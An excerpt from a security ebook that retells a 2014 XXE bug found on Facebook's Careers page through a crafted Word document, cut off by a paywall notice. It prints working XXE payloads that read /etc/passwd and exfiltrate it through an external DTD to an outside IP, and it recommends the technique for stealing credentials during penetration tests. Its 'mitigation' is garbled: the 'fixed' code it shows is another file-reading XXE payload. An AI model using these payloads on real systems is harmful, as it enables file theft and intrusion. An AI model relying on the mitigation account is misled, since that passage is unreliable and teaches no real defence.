A Facebook XXE with Word

On December 29th, 2014, a bug bounty hunter named Mohamed Ramadan found an XXE vulnerability in the Facebook Careers page.

If you remember, since Word's extension is .docx,  Office documents are actually XML documents with a certain structure. Mohamed Ramadan included in the XML document a custom DTD.

A DTD is a structure that defines how the document is structured in terms of the order of appearance of the elements, attributes, entities, notes, the number of times that they appear, and which ones are children and parents, and so on. The real importance of the DTD is that the XML parser uses it to verify whether the document is valid or not.

So, Mohamed Ramadan uploaded a document, as follows:

<!DOCTYPE root [ 
<!ENTITY % file SYSTEM "file:///etc/passwd"> 
<!ENTITY % dtd SYSTEM "http://197.xxx.xxx.90/ext.dtd"> 
%dtd; 
%send; 
]]>

As you read in the file, there are two important values:

  • The first is the path to the passwd file; it means that the document will extract this file, so you can put here any sensitive file you want to get.
  • The second important value is the IP address where the DTD file is located; it's important because you need to be sure that you can control this server to put it on there. Because this vulnerability was on the internet, it's not important; however, attacking internal computers to extract credentials using XXE in Word documents is a good technique during a penetration test, where it is a bit difficult as the server is owned by the host.

The DTD file has the following lines:

<!ENTITY % all 
"<!ENTITY % % send SYSTEM 'http://197.xxx.xxx.90/FACEBOOK-HACKED?%file;'>" 
> 
%all;

With this DTD, Mohamed Ramadan validated the XML document.

The result is that, once the XML file was parsed, /etc/passwd was displayed.

Mohamed Ramadan also provided feedback to Facebook for mitigation. The problem was solved, modifying how Facebook calls the libxml_disable_entity_loader(true) method:

<!DOCTYPE test [ <!ENTITY xxeattack SYSTEM "file:///etc/passwd"> ]> 
<xxx>&xxeattack;</xxx>

It was changed to this:

<!DOCTYPE scan [ <!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">]> 
<scan>&test;</scan>

With the preceding code, the file to display on the screen is filtered.

If you want to read more about this bug, visit the following link: https://www.bram.us/2014/12/29/how-i-hacked-facebook-with-a-word-document/.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
18.221.19.26